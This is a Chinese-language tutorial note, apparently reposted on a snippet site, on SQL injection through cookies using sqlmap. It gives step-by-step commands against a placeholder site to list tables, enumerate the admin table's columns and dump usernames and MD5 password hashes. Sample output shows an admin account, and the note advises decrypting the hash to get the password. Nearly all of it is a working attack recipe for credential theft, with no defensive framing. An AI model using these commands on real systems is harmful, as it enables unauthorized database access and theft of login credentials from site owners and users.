首页 > 代码库 > 3.sqlmap学习笔记之Cookie注入
3.sqlmap学习笔记之Cookie注入
Cookie注入:
1.假设这个网址"http://www.xxx.org/Show.asp?id=9"存在注入点.
2.sqlmap命令提示符下输入下列内容进行跑表。
sqlmap -u "http://www.xxx.org/Show.asp" --cookie "id=9" --table --level 2
假设返回内容如下,说明是access数据库。
------------------------- [INFO] resuming back-end DBMS ‘microsoft access‘ -------------------------
设置线程数:10
假设返回结果:
-------------------------------------------[ 4 tables]+----------------------+ admin mark province vote+----------------------+
找到四个表分别为:admin mark province vote
3.猜表的字段名:
sqlmap -u "http://www.xxx.org/Show.asp" --cookie "id=9" --columns -T admin --level 2
假设找到admin表的字段如下:
id username password
--------------------------------- [INFO] retrieved: id [INFO] retrieved: username [INFO] retrieved: password----------------------------------
4.猜测字段的内容:
sqlmap -u "http://www.xxx.org/Show.asp" --cookie "id=9" --dump -T admin -C "username,password" --level 2
获取结果:
[INFO] retrieved: 1 [INFO] retrieved: admin [INFO] retrieved: 21232f297a57a5a743894a0e4a801fc3 (32位MD5加密密文)
账号:admin 密码:将密文解密即可。
3.sqlmap学习笔记之Cookie注入
声明:以上内容来自用户投稿及互联网公开渠道收集整理发布,本网站不拥有所有权,未作人工编辑处理,也不承担相关法律责任,若内容有误或涉及侵权可进行投诉: 投诉/举报 工作人员会在5个工作日内联系你,一经查实,本站将立刻删除涉嫌侵权内容。